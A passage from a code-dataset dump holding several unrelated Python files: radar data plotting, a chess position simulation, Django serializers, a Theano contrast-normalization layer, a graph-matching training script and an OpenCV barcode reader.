self.assertTrue(mocked.call_args[0][0].startswith(url))\n","repo_name":"shotgunsoftware/sg-jira-bridge","sub_path":"tests/test_sg_trigger.py","file_name":"test_sg_trigger.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"60"} +{"seq_id":"1787148864","text":"import bz2\nimport pathlib\n\nimport pandas as pd\nimport pydarn\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom scipy import stats\n\nfrom lib.elevation_v2 import elevation_v2\nfrom DataAnalysis.EchoOccurrence.lib.add_decimal_hour_to_df import add_decimal_hour_to_df\n\n\ndef range_time_profiler(df, gate_range, hour_range, param, zlimits, time_units='ut'):\n \"\"\"\n\n A simple range time profiler for a single parameter.\n\n :param df: pandas.DataFrame:\n A SuperDARN fit dataframe.\n :param gate_range: (int, int):\n The gate range to profile (y-axis limits)\n :param hour_range: (float, float):\n The hour range to profile (x-axis limits)\n :param param: str:\n The fit parameter to range-time profile\n :param zlimits: (float, float):\n The z limits. For example, for param='vel' this is usually (-600, 600).\n\n :param time_units: str (optional; default is 'ut')\n The time units to use.\n 'ut' for universal time\n 'mlt' for magnetic local time\n 'lt' for local time (based on longitude)\n 'lst' for local standard time (based on time zones)\n 'ast' for apparent solar time (based on the apparent angular motion of the sun across the sky)\n\n :return fig: matplotlib.pyplot.figure:\n\n \"\"\"\n\n if len(df) <= 0:\n raise Exception(\"range_time_profiler(): Empty dataframe.\")\n\n # Add UT decimal hour to df\n station = df['station'].iat[0]\n df = add_decimal_hour_to_df(df=df, time_units=time_units, stid=pydarn.read_hdw_file(station).stid,\n date_time_est=df['datetime'].iat[0])\n df = df.loc[(df[time_units] > hour_range[0]) & (df[time_units] < hour_range[1]) &\n (df['gate'] > gate_range[0]) & (df['gate'] < gate_range[1])]\n\n # Compute hour edges\n bins_per_hour = 60\n n_bins_x = int((hour_range[1] - hour_range[0]) * bins_per_hour)\n hour_edges = np.linspace(hour_range[0], hour_range[1], num=(n_bins_x + 1))\n\n # Compute gate_edges\n bins_per_gate = 1\n n_bins_y = int(((gate_range[1] + 1) - gate_range[0]) * bins_per_gate)\n gate_edges = np.linspace(gate_range[0], gate_range[1] + 1, num=(n_bins_y + 1), dtype=int)\n\n result, _, _, _ = stats.binned_statistic_2d(df[time_units], df['gate'], values=df[param],\n bins=[hour_edges, gate_edges])\n\n fig, ax = plt.subplots(figsize=(8, 4), dpi=300, constrained_layout=True, nrows=1, ncols=1)\n ax.set_xlabel(\"Hour [\" + time_units.upper() + \"]\")\n ax.set_ylabel(\"Range Gate\")\n ax.set_title(\"Parameter: \" + param)\n plot = ax.pcolormesh(hour_edges, gate_edges, result.transpose(), cmap='jet', vmin=zlimits[0], vmax=zlimits[1],\n zorder=0)\n\n cbar_text_format = '%d'\n if param == 'vel':\n cbar = fig.colorbar(plot, ax=ax, orientation=\"vertical\", format=cbar_text_format, extend='both')\n else:\n cbar = fig.colorbar(plot, ax=ax, orientation=\"vertical\", format=cbar_text_format, extend='max')\n\n return fig\n\n\nif __name__ == \"__main__\":\n \"\"\" \"\"\"\n\n station = \"hok\"\n year = \"2014\"\n month = \"02\"\n day = \"23\"\n\n param = 'adjPhase'\n zlimits = (-24, -16)\n\n # param = 'adjElv'\n # zlimits = (0, 40)\n\n t_diff = 0 # in nanoseconds\n gate_range = (0, 74)\n hour_range = (6, 12)\n beam = 7\n\n time_units = 'ut'\n start_hour = 6\n end_hour = 12\n\n # Read in SuperDARN data\n loc_root = str(((pathlib.Path().parent.absolute()).parent.absolute()))\n in_dir = loc_root + \"/DataAnalysis/DataReading/SD/data/\" + station + \"/\" + station + year + month + day\n in_file = in_dir + \"/\" + station + year + month + day + \".pbz2\"\n data_stream = bz2.BZ2File(in_file, \"rb\")\n df = pd.read_pickle(data_stream)\n\n df = df.loc[df['bmnum'] == beam]\n df.reset_index(drop=True, inplace=True)\n\n\n print(\"Recomputing elevation angles...\")\n elevation_v2(df=df, t_diff=t_diff / 1000)\n\n # print(df[['phase', 'adjPhase', 'adjElv']])\n # print(\"Adjusted phase max: \" + str(np.max(df['adjPhase'])))\n # print(\"Adjusted phase min: \" + str(np.min(df['adjPhase'])))\n\n fig = range_time_profiler(df=df, gate_range=gate_range, hour_range=hour_range, param=param, zlimits=zlimits,\n time_units='ut')\n plt.show()\n\n # Save the figure to file\n loc_root = str(pathlib.Path().parent.absolute())\n out_dir = loc_root + \"/out\"\n out_fig = out_dir + \"/rt_profile_\" + station + year + month + day + \"_\" + param + \"_tdiff_\" + str(t_diff) + \"ns\"\n print(\"Saving plot as \" + out_fig)\n fig.savefig(out_fig + \".jpg\", format='jpg', dpi=300)\n","repo_name":"mrl280/Summer2021PythonWork","sub_path":"lib/range_time_profiler.py","file_name":"range_time_profiler.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40603628125","text":"def my_sum(*args):\n if all ([(type(arg) == int or type(args) == float) for arg in args ]):\n total = 0\n for i in args:\n total += i\n return total\n else:\n return \"Wrong number\"\n\nprint (my_sum(2,4,6,8,10))\nprint (my_sum(2,4,6,8,10,'hershit'))","repo_name":"SachinPitale/Python3","sub_path":"Python-2020/Chapter_13/7.any_all_function_1.py","file_name":"7.any_all_function_1.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35925379253","text":"\"\"\"\r\n1.\r\n\"\"\"\r\n\r\nimport random\r\n\r\n#******************************\r\ndef ckeck_wrong_position():\r\n global wrong_position\r\n\r\n flag = 0\r\n rowWK = white_king // stiles\r\n colWK = white_king % stiles\r\n \r\n L=[]\r\n if rowWK - 1 >= 0:\r\n L.append([rowWK-1,colWK])\r\n if colWK - 1 >=0:\r\n L.append([rowWK-1,colWK-1])\r\n if colWK + 1 < 8 :\r\n L.append([rowWK-1,colWK+1])\r\n\r\n if colWK - 1 >=0:\r\n L.append([rowWK,colWK-1])\r\n if colWK + 1 < 8 : \r\n L.append([rowWK,colWK+1])\r\n\r\n if rowWK + 1 <8:\r\n L.append([rowWK+1,colWK])\r\n if colWK - 1 >=0:\r\n L.append([rowWK+1,colWK-1])\r\n if colWK + 1 < 8 :\r\n L.append([rowWK+1,colWK+1])\r\n\r\n i=0\r\n while i < len(L):\r\n if board[L[i][0]][L[i][1]] == \"BK\":\r\n flag = 1\r\n wrong_position += 1\r\n i=len(L)\r\n # for row in range(grames):\r\n # print(board[row])\r\n # print()\r\n\r\n i+=1\r\n\r\n\r\n return flag\r\n#******************************\r\n\r\n#******************************\r\ndef check_danger():\r\n global danger\r\n\r\n flag_danger = 0\r\n rowWQ = white_queen // stiles\r\n colWQ = white_queen % stiles\r\n\r\n start_row = rowWQ\r\n start_col = colWQ\r\n\r\n rowBK = black_king // stiles\r\n colBK = black_king % stiles\r\n\r\n # horizontal or vertical\r\n if (rowBK == rowWQ) or (colBK == colWQ):\r\n flag_danger = 1\r\n\r\n \r\n # diagonal 1\r\n start_row = rowWQ\r\n start_col = colWQ\r\n if flag_danger == 0:\r\n if colWQ == 0:\r\n start_row = rowWQ\r\n start_col = colWQ\r\n else:\r\n flag1 = 1\r\n while flag1:\r\n if start_row - 1 >= 0 and start_col - 1 >= 0:\r\n start_row -= 1\r\n start_col -= 1\r\n else:\r\n flag1 = 0\r\n\r\n\r\n flag1 = 1\r\n while flag1:\r\n if (start_row == rowBK) and (start_col == colBK):\r\n flag_danger = 1\r\n flag1 = 0\r\n else:\r\n start_row += 1\r\n start_col += 1 \r\n if start_row > 7 or start_col > 7:\r\n flag1 = 0\r\n\r\n # diagonal 2\r\n start_row = rowWQ\r\n start_col = colWQ\r\n if flag_danger == 0:\r\n if rowWQ == 0:\r\n start_row = rowWQ\r\n start_col = colWQ\r\n else:\r\n flag1 = 1\r\n while flag1:\r\n if start_row - 1 >= 0 and start_col + 1 <= 7:\r\n start_row -= 1\r\n start_col += 1\r\n else:\r\n flag1 = 0\r\n\r\n flag1 = 1\r\n while flag1:\r\n if (start_row == rowBK) and (start_col == colBK):\r\n flag_danger = 1\r\n flag1 = 0\r\n else:\r\n start_row += 1\r\n start_col -= 1 \r\n if start_row > 7 or start_col < 0:\r\n flag1 = 0\r\n \r\n if flag_danger == 1:\r\n danger += 1\r\n # for row in range(grames):\r\n # print(board[row])\r\n # print()\r\n\r\n\r\n return \r\n#******************************\r\n\r\ndanger = 0 \r\nwrong_position = 0\r\n\r\nstiles = 8\r\ngrames = stiles\r\nflag = 0\r\n\r\n\r\nfor times in range(100):\r\n\r\n board = [] # skakiera\r\n\r\n theseis = (grames * stiles)\r\n \r\n for i in range(grames):\r\n L1 = []\r\n for j in range(stiles):\r\n L1.append(\"00\")\r\n board.append(L1)\r\n\r\n white_queen = random.randint(0,theseis-1)\r\n row = white_queen // stiles\r\n col = white_queen % stiles\r\n board[row][col] = \"WQ\" \r\n\r\n i=1\r\n while i :\r\n white_king = random.randint(0,theseis-1)\r\n row = white_king // stiles\r\n col = white_king % stiles\r\n if board[row][col] == \"00\":\r\n board[row][col] = \"WK\"\r\n i=0\r\n\r\n i=1\r\n while i :\r\n black_king = random.randint(0,theseis-1)\r\n row = black_king // stiles\r\n col = black_king % stiles\r\n if board[row][col] == \"00\":\r\n board[row][col] = \"BK\"\r\n i=0 \r\n \r\n \r\n # for row in range(grames):\r\n # print(board[row])\r\n # print()\r\n \r\n\r\n flag = ckeck_wrong_position()\r\n if flag == 0:\r\n check_danger()\r\n\r\n\r\nprint( 'σε απειλή : ', danger ) \r\nprint( 'σε λάθος θέση : ', wrong_position ) \r\n","repo_name":"GabrielAbdo/P20248","sub_path":"exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"40480942581","text":"from rest_framework import serializers\nfrom ..appointment.models import Appointment\nfrom ..users.models import Doctor, User\n\n\nclass AppointmentDetailSerializer(serializers.HyperlinkedModelSerializer):\n doctor = serializers.PrimaryKeyRelatedField(queryset=Doctor.objects.all())\n class Meta:\n model = Appointment\n fields = ['email', 'status', 'date', 'time', 'doctor', 'comments']\n extra_kwargs = {\n 'status': {\n 'read_only': True\n }\n }\n\n def create(self, validated_data):\n if not User.objects.filter(email=validated_data['email']).exists():\n email = validated_data['email']\n user_data = {}\n user_data['email'] = email\n user_data['username'] = email\n user_data['first_name'] = email\n user_data['last_name'] = email\n user_data['is_patient'] = True\n User.objects.create(**user_data)\n return Appointment.objects.create(**validated_data)\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ('first_name', 'last_name', 'email', 'username',)\n\n\nclass DoctorSerializer(serializers.ModelSerializer):\n user = UserSerializer()\n\n class Meta:\n model = Doctor\n fields = ('user', 'pk')\n\n def create(self, validated_data):\n user = User.objects.create(**validated_data['user'])\n return Doctor.objects.create(user=user)\n","repo_name":"vanegg/app_pediatricians","sub_path":"yema/apps/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18515258114","text":"import theano\nimport theano.tensor as T\nimport numpy\nfrom theano.tensor.nnet import conv\n#import pylab\n# source : https://github.com/jostosh/theano_utils/blob/master/lcn.py\n\nclass LecunLCN(object):\n def __init__(self, X, image_shape, threshold=1e-4, radius=9, use_divisor=True):\n \"\"\"\n Allocate an LCN.\n\n :type X: theano.tensor.dtensor4\n :param X: symbolic image tensor, of shape image_shape\n\n :type image_shape: tuple or list of length 4\n :param image_shape: (batch size, num input feature maps,\n image height, image width)\n :type threshold: double\n :param threshold: the threshold will be used to avoid division by zeros\n\n :type radius: int\n :param radius: determines size of Gaussian filter patch (default 9x9)\n\n :type use_divisor: Boolean\n :param use_divisor: whether or not to apply divisive normalization\n \"\"\"\n\n # Get Gaussian filter\n filter_shape = (1, image_shape[1], radius, radius)\n\n self.filters = theano.shared(self.gaussian_filter(filter_shape), borrow=True)\n\n # Compute the Guassian weighted average by means of convolution\n convout = conv.conv2d(\n input=X,\n filters=self.filters,\n image_shape=image_shape,\n filter_shape=filter_shape,\n border_mode='full'\n )\n\n # Subtractive step\n mid = int(numpy.floor(filter_shape[2] / 2.))\n\n # Make filter dimension broadcastable and subtract\n centered_X = X - T.addbroadcast(convout[:, :, mid:-mid, mid:-mid], 1)\n\n # Boolean marks whether or not to perform divisive step\n if use_divisor:\n # Note that the local variances can be computed by using the centered_X\n # tensor. If we convolve this with the mean filter, that should give us\n # the variance at each point. We simply take the square root to get our\n # denominator\n\n # Compute variances\n sum_sqr_XX = conv.conv2d(\n input=T.sqr(centered_X),\n filters=self.filters,\n image_shape=image_shape,\n filter_shape=filter_shape,\n border_mode='full'\n )\n\n\n # Take square root to get local standard deviation\n denom = T.sqrt(sum_sqr_XX[:,:,mid:-mid,mid:-mid])\n\n per_img_mean = denom.mean(axis=[2,3])\n divisor = T.largest(per_img_mean.dimshuffle(0, 1, 'x', 'x'), denom)\n # Divisise step\n new_X = centered_X / T.maximum(T.addbroadcast(divisor, 1), threshold)\n else:\n new_X = centered_X\n\n self.output = new_X\n\n\n def gaussian_filter(self, kernel_shape):\n x = numpy.zeros(kernel_shape, dtype=theano.config.floatX)\n\n def gauss(x, y, sigma=2.0):\n Z = 2 * numpy.pi * sigma ** 2\n return 1. / Z * numpy.exp(-(x ** 2 + y ** 2) / (2. * sigma ** 2))\n\n mid = numpy.floor(kernel_shape[-1] / 2.)\n for kernel_idx in xrange(0, kernel_shape[1]):\n for i in xrange(0, kernel_shape[2]):\n for j in xrange(0, kernel_shape[3]):\n x[0, kernel_idx, i, j] = gauss(i - mid, j - mid)\n\n return x / numpy.sum(x)\n\ndef lcn_function(radius=13):\n\tX = T.tensor4('x')\n\top = LecunLCN(X=X, image_shape=(1,1,32,32), radius=radius)\n\tf = theano.function([X], op.output, allow_input_downcast=True)\n\treturn f\n\nif __name__==\"__main__\":\n\tf = lcn() # TO BE TESTED\n\tx_value = numpy.random.ranf((1, 1, 32, 32))\n\ty_value = f(x_value)\n\timport pdb\n\tpdb.set_trace()\n","repo_name":"mducoffe/Active_Learning_Variational_Inference_Deep_Networks","sub_path":"old_version/lcn.py","file_name":"lcn.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"28204385136","text":"from __future__ import division\r\nfrom __future__ import print_function\r\nfrom platform import node\r\n\r\nimport time\r\nimport argparse\r\nimport numpy as np\r\n\r\nimport torch\r\nimport torch.optim as optim\r\nfrom torch.autograd import Variable\r\nimport itertools\r\n\r\nfrom utils import load_data\r\nfrom models import *\r\nfrom os import mkdir\r\nfrom os.path import exists\r\n\r\n# from tqdm import tqdm\r\nfrom sklearn.metrics import f1_score, precision_score, accuracy_score, recall_score\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--data_name', type=str, default='nci',\r\n help='data_name, nci, pubchem, fda.')\r\nparser.add_argument('--no-cuda', action='store_true', default=False,\r\n help='Disables CUDA training.')\r\nparser.add_argument('--recon', action='store_true', default=True,\r\n help='Enable recon.')\r\nparser.add_argument('--seed', type=int, default=42, help='Random seed.')\r\nparser.add_argument('--epochs', type=int, default=1500,\r\n help='Number of epochs to train.')\r\nparser.add_argument('--lr', type=float, default=0.0005,\r\n help='Initial learning rate.')\r\nparser.add_argument('--re_lr', type=float, default=0.001,\r\n help='Initial recon learning rate.')\r\nparser.add_argument('--lr_wd', type=float, default=0.01)\r\nparser.add_argument('--predict_th', type=float, default=0.65)\r\nparser.add_argument('--emb_size', type=int, default=400,\r\n help='Number of emb_size to train.')\r\nparser.add_argument('--weight_decay', type=float, default=5e-4,\r\n help='Weight decay (L2 loss on parameters).')\r\nparser.add_argument('--hidden', type=int, default=128,\r\n help='Number of hidden units.')\r\nparser.add_argument('--gcn_out', type=int, default=64,\r\n help='Number of out units.')\r\n# parser.add_argument('--out', type=int, default=32,\r\n# help='Number of out units.')\r\nparser.add_argument('--dropout', type=float, default=0.5,\r\n help='Dropout rate (1 - keep probability).')\r\n\r\ndef w_loss(q_nodes_features, d_nodes_features):\r\n q_nodes_features = q_nodes_features.reshape(q_nodes_features.shape[0]*q_nodes_features.shape[1], q_nodes_features.shape[2])\r\n d_nodes_features = d_nodes_features.reshape(d_nodes_features.shape[0]*d_nodes_features.shape[1], d_nodes_features.shape[2])\r\n for j in range(5):\r\n w0 = wdiscriminator(q_nodes_features)\r\n w1 = wdiscriminator(d_nodes_features)\r\n anchor1 = w1.view(-1).argsort(descending=True)[: d_nodes_features.size(0)]\r\n anchor0 = w0.view(-1).argsort(descending=False)[: d_nodes_features.size(0)]\r\n embd0_anchor = q_nodes_features[anchor0, :].clone().detach()\r\n embd1_anchor = d_nodes_features[anchor1, :].clone().detach()\r\n optimizer_wd.zero_grad()\r\n loss = -torch.mean(wdiscriminator(embd0_anchor)) + torch.mean(wdiscriminator(embd1_anchor))\r\n loss.backward()\r\n optimizer_wd.step()\r\n for p in wdiscriminator.parameters():\r\n p.data.clamp_(-0.1, 0.1)\r\n w0 = wdiscriminator(q_nodes_features)\r\n w1 = wdiscriminator(d_nodes_features)\r\n anchor1 = w1.view(-1).argsort(descending=True)[: d_nodes_features.size(0)]\r\n anchor0 = w0.view(-1).argsort(descending=False)[: d_nodes_features.size(0)]\r\n embd0_anchor = q_nodes_features[anchor0, :]\r\n embd1_anchor = d_nodes_features[anchor1, :]\r\n return -torch.mean(wdiscriminator(embd1_anchor))\r\n\r\ndef train(query_num, ground_truth, adjs, total_num, node_max, masks, train_idx_set_list, t_q_num, t_d_num, train_data_idx, train_node_num):\r\n model.train()\r\n extract_model.train()\r\n trans.train()\r\n wdiscriminator.train()\r\n\r\n optimizer.zero_grad()\r\n optimizer_wd.zero_grad()\r\n if(args.recon):\r\n renn_model.train()\r\n renn_optimizer.zero_grad()\r\n \r\n extract_features = extract_model(features) * masks\r\n output = model(extract_features, adjs) * masks\r\n if(args.recon):\r\n recon = renn_model(output) * masks\r\n recon = recon[train_idx_set_list]\r\n output = output.reshape(total_num, node_max, output.shape[-1])\r\n \r\n comp_features = features * masks\r\n comp_features = comp_features[train_idx_set_list]\r\n\r\n q_nodes_features = output[:int(query_num * 0.8)]\r\n d_nodes_features = output[query_num:]\r\n\r\n l_w = w_loss(q_nodes_features, trans(d_nodes_features))\r\n\r\n d_nodes_features = d_nodes_features[train_data_idx]\r\n d_nodes_features = d_nodes_features.reshape(t_q_num , t_d_num, d_nodes_features.shape[1], d_nodes_features.shape[2])\r\n relation = torch.matmul(q_nodes_features.unsqueeze(1), d_nodes_features.permute(0,1,3,2))\r\n relation_sum = relation.sum(dim=-1).sum(dim=-1)\r\n avg_relationt = relation_sum / train_node_num\r\n results = torch.sigmoid(avg_relationt)\r\n predict = torch.where(results > args.predict_th, 1, 0)\r\n l_m = ( - (ground_truth * torch.log(results + 1e-9) + (1 - ground_truth) * torch.log(1 - results + 1e-9))).mean()\r\n if(args.recon):\r\n l_r = torch.norm(recon - comp_features, dim=1, p=2).mean()\r\n loss_train = l_m * 0.9895 + l_r * 0.01 + l_w * 0.0005\r\n else:\r\n loss_train = l_m * 0.999 + l_w * 0.001\r\n loss_train.backward() \r\n optimizer.step()\r\n optimizer_wd.step()\r\n if(args.recon):\r\n renn_optimizer.step()\r\n ground_truth = ground_truth.reshape(ground_truth.shape[0] * ground_truth.shape[1])\r\n predict = predict.reshape(predict.shape[0] * predict.shape[1])\r\n ground_truth = ground_truth.cpu()\r\n predict = predict.cpu()\r\n # print('loss: {:.4f}'.format(loss_train))\r\n # # 'acc:{:.4f}'.format(accuracy_score(ground_truth, predict)),\r\n # # \"pre:{:.4f}\".format(precision_score(ground_truth, predict)),\r\n # # \"F1:{:.4f}\".format(f1_score(ground_truth, predict)),\r\n # # \"recall:{:.4f}\".format(recall_score(ground_truth, predict)))\r\n\r\ndef test(query_num, ground_truth, adjs, total_num, node_max, masks, test_idx_set_list, t_q_num, t_d_num, test_data_idx, test_node_num):\r\n\r\n model.eval()\r\n extract_model.eval()\r\n extract_features = extract_model(features) * masks\r\n output = model(extract_features, adjs) * masks\r\n\r\n output = output.reshape(total_num, node_max, output.shape[-1])\r\n comp_features = features * masks\r\n comp_features = comp_features[test_idx_set_list]\r\n \r\n d_nodes_features = output[query_num:][test_data_idx]\r\n d_nodes_features = d_nodes_features.reshape(t_q_num , t_d_num, d_nodes_features.shape[1], d_nodes_features.shape[2]).permute(0,1,3,2)\r\n start_time = time.time()\r\n relation = torch.matmul(q_nodes_features, d_nodes_features).sum(dim=-1).sum(dim=-1) / test_node_num\r\n results = torch.sigmoid(relation)\r\n predict = torch.where(results > args.predict_th, 1, 0)\r\n end_time = time.time()\r\n print(\"Test set results:\",\r\n # \"loss= {:.4f}\".format(loss_test.item()),\r\n \"time:= {:.6f}\".format(end_time - start_time))\r\n ground_truth = ground_truth.reshape(int(ground_truth.shape[0] * ground_truth.shape[1]))\r\n predict = predict.reshape(predict.shape[0] * predict.shape[1])\r\n ground_truth = ground_truth.cpu()\r\n predict = predict.cpu()\r\n print('accuracy:{:.4f}'.format(accuracy_score(ground_truth, predict)))\r\n print(\"prediction:{:.4f}\".format(precision_score(ground_truth, predict)))\r\n print(\"F1-Score:{:.4f}\".format(f1_score(ground_truth, predict)))\r\n print(\"recall-score:{:.4f}\".format(recall_score(ground_truth, predict)))\r\n\r\ndef start_train(query_num, ground_truth, adjs, node_max, masks, train_idx_list, query_node_num, data_node_num):\r\n global features, model, renn_model, extract_model, trans, wdiscriminator\r\n q_idx_list = train_idx_list[:int(query_num*0.8)]\r\n t_idx_list = train_idx_list[int(query_num*0.8):]\r\n train_idx_set_list = torch.LongTensor(list(set(q_idx_list[:,0][:,0].tolist() + (q_idx_list[:,1].reshape(q_idx_list[:,1].shape[0]*q_idx_list[:,1].shape[1])+query_num).tolist())))\r\n test_idx_set_list = torch.LongTensor(list(set(t_idx_list[:,0][:,0].tolist() + (t_idx_list[:,1].reshape(t_idx_list[:,1].shape[0]*t_idx_list[:,1].shape[1])+query_num).tolist())))\r\n if args.cuda:\r\n model.cuda() \r\n extract_model.cuda()\r\n trans.cuda()\r\n wdiscriminator.cuda()\r\n if(args.recon):\r\n renn_model.cuda()\r\n features = features.cuda()\r\n ground_truth, adjs, masks, query_node_num, data_node_num = ground_truth.cuda(), adjs.cuda(), masks.cuda(), query_node_num.cuda(), data_node_num.cuda()\r\n q_idx_list, t_idx_list = q_idx_list.cuda(), t_idx_list.cuda()\r\n train_idx_set_list, test_idx_set_list = train_idx_set_list.cuda(), test_idx_set_list.cuda()\r\n t_q_num = q_idx_list[:,1].shape[0]\r\n t_d_num = q_idx_list[:,1].shape[1]\r\n train_data_idx = q_idx_list[:,1].reshape(t_q_num * t_d_num)\r\n train_query_node_num = query_node_num[:int(query_num*0.8)]\r\n train_data_node_num = data_node_num[train_data_idx].reshape(t_q_num, t_d_num)\r\n train_node_num = train_query_node_num.expand(train_data_node_num.shape[1], train_data_node_num.shape[0]).T * train_data_node_num\r\n total_num = int(features.shape[0] / node_max)\r\n\r\n t_t_q_num = t_idx_list[:,1].shape[0]\r\n t_t_d_num = t_idx_list[:,1].shape[1]\r\n test_data_idx = t_idx_list[:,1].reshape(t_t_q_num * t_t_d_num)\r\n test_query_node_num = query_node_num[int(query_num*0.8):query_num]\r\n test_data_node_num = data_node_num[test_data_idx].reshape(t_t_q_num, t_t_d_num)\r\n test_node_num = test_query_node_num.expand(test_data_node_num.shape[1], test_data_node_num.shape[0]).T * test_data_node_num\r\n \r\n\r\n if(not exists('./model_{}'.format(data_name))):\r\n mkdir('./model_{}'.format(data_name))\r\n # train(query_num, ground_truth[:int(query_num*0.8)], adjs, total_num, node_max, masks, train_idx_set_list, t_q_num, t_d_num, train_data_idx, train_node_num)\r\n if(not exists('./model_{}/{}_main_model.pt'.format(data_name, data_name))):\r\n for epoch in range(1, args.epochs+1):\r\n # print('epoch:{}'.format(epoch))\r\n train(query_num, ground_truth[:int(query_num*0.8)], adjs, total_num, node_max, masks, train_idx_set_list, t_q_num, t_d_num, train_data_idx, train_node_num)\r\n torch.save(model, './model_{}/{}_main_model.pt'.format(data_name, data_name))\r\n torch.save(model.state_dict(),'./model_{}/{}_main_model_states.pt'.format(data_name, data_name))\r\n torch.save(extract_model, './model_{}/{}_extra_model.pt'.format(data_name, data_name))\r\n torch.save(extract_model.state_dict(),'./model_{}/{}_extra_model_states.pt'.format(data_name, data_name))\r\n torch.save(renn_model, './model_{}/{}_renn_model.pt'.format(data_name, data_name))\r\n torch.save(renn_model.state_dict(),'./model_{}/{}_renn_model_states.pt'.format(data_name, data_name))\r\n torch.save(trans, './model_{}/{}_trans_model.pt'.format(data_name, data_name))\r\n torch.save(trans.state_dict(),'./model_{}/{}_trans_model_states.pt'.format(data_name, data_name))\r\n torch.save(wdiscriminator, './model_{}/{}_wd_model.pt'.format(data_name, data_name))\r\n torch.save(wdiscriminator.state_dict(),'./model_{}/{}_wd_model_states.pt'.format(data_name, data_name))\r\n else:\r\n model.load_state_dict(torch.load('./model_{}/{}_main_model_states.pt'.format(data_name, data_name)))\r\n extract_model.load_state_dict(torch.load('./model_{}/{}_extra_model_states.pt'.format(data_name, data_name)))\r\n renn_model.load_state_dict(torch.load('./model_{}/{}_renn_model_states.pt'.format(data_name, data_name)))\r\n trans.load_state_dict(torch.load('./model_{}/{}_trans_model_states.pt'.format(data_name, data_name)))\r\n wdiscriminator.load_state_dict(torch.load('./model_{}/{}_wd_model_states.pt'.format(data_name, data_name)))\r\n\r\n test(query_num, ground_truth[int(query_num*0.8):], adjs, total_num, node_max, masks, test_idx_set_list, t_t_q_num, t_t_d_num, test_data_idx, test_node_num)\r\n\r\n\r\nif __name__ == '__main__':\r\n args = parser.parse_args()\r\n args.cuda = not args.no_cuda and torch.cuda.is_available()\r\n data_name = args.data_name\r\n np.random.seed(args.seed)\r\n torch.manual_seed(args.seed)\r\n if args.cuda:\r\n torch.cuda.manual_seed(args.seed)\r\n\r\n features, query_num, ground_truth, adjs, node_max, masks, train_idx_list, query_node_num, data_node_num = load_data(data_name = data_name)\r\n model = GCN(nfeat=args.emb_size,\r\n nhid=args.hidden,\r\n nclass=args.gcn_out,\r\n dropout=args.dropout)\r\n\r\n extract_model = NN(nfeat=features.shape[1], nhid=args.emb_size)\r\n \r\n renn_model = RENN(nclass=args.gcn_out,nfeat=features.shape[1])\r\n\r\n trans = transformation(args.gcn_out)\r\n \r\n optimizer = optim.Adam(itertools.chain(extract_model.parameters(), model.parameters(), trans.parameters()),\r\n lr=args.lr, weight_decay=args.weight_decay)\r\n \r\n renn_optimizer = optim.Adam(renn_model.parameters(),\r\n lr=args.re_lr, weight_decay=args.weight_decay)\r\n\r\n wdiscriminator = WDiscriminator(args.gcn_out)\r\n optimizer_wd = torch.optim.Adam(wdiscriminator.parameters(), lr=args.lr_wd, weight_decay=5e-4)\r\n\r\n start_train(query_num, ground_truth, adjs, node_max, masks, train_idx_list, query_node_num, data_node_num)\r\n print('dataset:',data_name)\r\n \r\n","repo_name":"yujianke100/NSS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"41676566991","text":"import numpy as np\r\nimport cv2\r\nimport os\r\nfrom cv2 import waitKey\r\nfrom cmath import sqrt, phase\r\nfrom itertools import groupby\r\nfrom collections import Counter\r\nimport math\r\n\r\n#device=0\r\n#cap=cv2.VideoCapture(device)\r\ndef detect_CB(cap):\r\n \r\n ret, dst = cap.read()\r\n code_barre=\"NULL\"\r\n if ret==True:\r\n gray = cv2.cvtColor(dst,cv2.COLOR_BGR2GRAY)\r\n height, width = gray.shape[:2]\r\n lines=detect_lines(gray) \r\n if (lines is not None) and len(lines[0])>4 :\r\n coord=[]\r\n for x1,y1,x2,y2 in lines[0]:\r\n norme=abs(sqrt((x1-x2)^2+(y1-y2)^2))\r\n if norme!=0 :\r\n x0=(x1-x2)/norme\r\n x0=int(x0)\r\n y0=(y1-y2)/norme\r\n y0=int(y0)\r\n coord.append([x0,y0])\r\n \r\n #print(\"coord=\"+str(coord))\r\n coord.sort(cmp=None, key=None, reverse=False)\r\n #print(\"coord=\"+str(coord))\r\n \r\n listMax=[len(list(group)) for key, group in groupby(coord)]\r\n #print(\"listMax=\"+str(listMax))\r\n \r\n inde=listMax.index(max(listMax))\r\n \r\n c=0\r\n for i in range(inde) :\r\n c=c+listMax[i]\r\n \r\n vect=coord[c+1]\r\n \r\n angle=math.degrees(-np.pi/2+phase(complex(vect[0],vect[1])))\r\n #print(-np.pi/2+phase(complex(vect[0],vect[1])))\r\n #print(round(angle))\r\n M=cv2.getRotationMatrix2D((width/2,height/2),round(angle),1.0)\r\n dst = cv2.warpAffine(dst,M,(width,height))\r\n \r\n \r\n \r\n \r\n filename='img_modifie.png'\r\n cv2.imwrite(filename,dst)\r\n commande='zbarimg '+filename\r\n #print(commande)\r\n code_barre=os.popen(commande).read()\r\n code_barre=str(code_barre)\r\n i=-1\r\n i=code_barre.rfind('EAN-13:')\r\n #print(\"i=\"+str(i))\r\n if i!=-1 :\r\n \r\n #print(code_barre)\r\n code_barre=code_barre.replace('EAN-13:','')\r\n #print(\"length=\"+str(len(code_barre)))\r\n #if code_barre[len(code_barre)-1]==\"\\0\":\r\n code_barre=code_barre[:len(code_barre)-1]\r\n #print(code_barre)\r\n if checksum(code_barre)==False:\r\n 